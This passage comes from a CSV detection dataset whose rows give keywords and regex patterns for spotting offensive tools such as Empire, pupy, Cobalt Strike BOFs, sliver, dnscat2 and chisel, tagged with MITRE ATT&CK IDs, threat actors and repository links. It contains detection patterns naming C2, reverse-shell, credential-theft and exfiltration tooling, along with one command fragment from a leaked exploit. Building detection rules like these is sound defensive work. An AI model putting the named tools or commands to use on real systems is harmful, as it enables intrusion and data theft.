cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*send_invoke_shellcode(*ratID*",".{0,1000}send_invoke_shellcode\(.{0,1000}ratID.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" 
"*send_ps1_payload*",".{0,1000}send_ps1_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*send_ratcode(ratID=*",".{0,1000}send_ratcode\(ratID\=.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*send_shellcode_msbuild_xml(*ratID*",".{0,1000}send_shellcode_msbuild_xml\(.{0,1000}ratID.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*send_shellcode_via_pipe*",".{0,1000}send_shellcode_via_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","109","14","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*send_shellcode_via_pipe*",".{0,1000}send_shellcode_via_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*Send-CalendarNTLMLeak *",".{0,1000}Send\-CalendarNTLMLeak\s.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*sendcmd(*cmd:PSCMDMessage*",".{0,1000}sendcmd\(.{0,1000}cmd\:PSCMDMessage.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*Sending loot to pastebin webserver.*",".{0,1000}Sending\sloot\sto\spastebin\swebserver\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Sending malicious packet to 
infected machine*",".{0,1000}Sending\smalicious\spacket\sto\sinfected\smachine.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Sending msf payload *",".{0,1000}Sending\smsf\spayload\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sendmail -osendmail chmod +x sendmail*",".{0,1000}sendmail\s\-osendmail\schmod\s\+x\ssendmail.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow
allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*sends the jscript file to the rat (JS and HTA only) to be evaulated in line. Useful for Gadget2JS payloads*",".{0,1000}sends\sthe\sjscript\sfile\sto\sthe\srat\s\(JS\sand\sHTA\sonly\)\sto\sbe\sevaulated\sin\sline\.\sUseful\sfor\sGadget2JS\spayloads.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*SendToPasteBin.ps1*",".{0,1000}SendToPasteBin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*sense2john.py*",".{0,1000}sense2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" 
"*SenseCncProxy.exe*",".{0,1000}SenseCncProxy\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*sensepost/goDoH*",".{0,1000}sensepost\/goDoH.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*sensepost/godoh*",".{0,1000}sensepost\/godoh.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*sensepost/impersonate*",".{0,1000}sensepost\/impersonate.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*sensepost/kwetza*",".{0,1000}sensepost\/kwetza.{0,1000}","offensive_tool_keyword","kwetza","Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.","T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002","TA0001 - TA0004 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/sensepost/kwetza","1","0","N/A","N/A","7","623","240","2023-07-21T16:30:40Z","2016-09-22T14:39:10Z" "*sensepost/rattler*",".{0,1000}sensepost\/rattler.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","1","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*sensepost/reGeorg*",".{0,1000}sensepost\/reGeorg.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*sensepost/ruler*",".{0,1000}sensepost\/ruler.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*sensepost/wiresocks*",".{0,1000}sensepost\/wiresocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*sensitive_files_win.txt*",".{0,1000}sensitive_files_win\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Sensitivelocalfiles.txt*",".{0,1000}Sensitivelocalfiles\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*senzee1984/InflativeLoading*",".{0,1000}senzee1984\/InflativeLoading.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*senzee1984/micr0_shell*",".{0,1000}senzee1984\/micr0_shell.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*senzee1984/MutationGate*",".{0,1000}senzee1984\/MutationGate.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - 
TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","1","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*seriously_nothing_shady_here*",".{0,1000}seriously_nothing_shady_here.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Serve Pyramid files over HTTP/S and provide basic authentication.*",".{0,1000}Serve\sPyramid\sfiles\sover\sHTTP\/S\sand\sprovide\sbasic\sauthentication\..{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*serve_ps1_payload*",".{0,1000}serve_ps1_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Server enforces NLA; switching to 'fake server' mode*",".{0,1000}Server\senforces\sNLA\;\sswitching\sto\s\'fake\sserver\'\smode.{0,1000}","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1364","326","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z" "*server.py generate --address * --port * --output * --source*",".{0,1000}server\.py\sgenerate\s\-\-address\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-output\s.{0,1000}\s\-\-source.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*server/modules/csharp/*",".{0,1000}server\/modules\/csharp\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 
- T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*server/ToRat_server*",".{0,1000}server\/ToRat_server.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administration tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*server@egress-asses.com*",".{0,1000}server\@egress\-asses\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*server=*port=53531*",".{0,1000}server\=.{0,1000}port\=53531.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to 
create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3256","587","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z" "*-server=http://127.0.0.1:4002*",".{0,1000}\-server\=http\:\/\/127\.0\.0\.1\:4002.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*server-7566091c4e4a2a24.js*",".{0,1000}server\-7566091c4e4a2a24\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*server-console.exe +*",".{0,1000}server\-console\.exe\s\+.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*server-console.py --mifi-ip *",".{0,1000}server\-console\.py\s\-\-mifi\-ip\s.{0,1000}","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","344","37","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z" "*ServerlessRedirector-main*",".{0,1000}ServerlessRedirector\-main.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","N/A","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*--server-port * --server-ip * --proxy-ip * --proxy-port *",".{0,1000}\-\-server\-port\s.{0,1000}\s\-\-server\-ip\s.{0,1000}\s\-\-proxy\-ip\s.{0,1000}\s\-\-proxy\-port\s.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*serverscan.linux.elf*",".{0,1000}serverscan\.linux\.elf.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 
- T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*serverscan.linux.so*",".{0,1000}serverscan\.linux\.so.{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 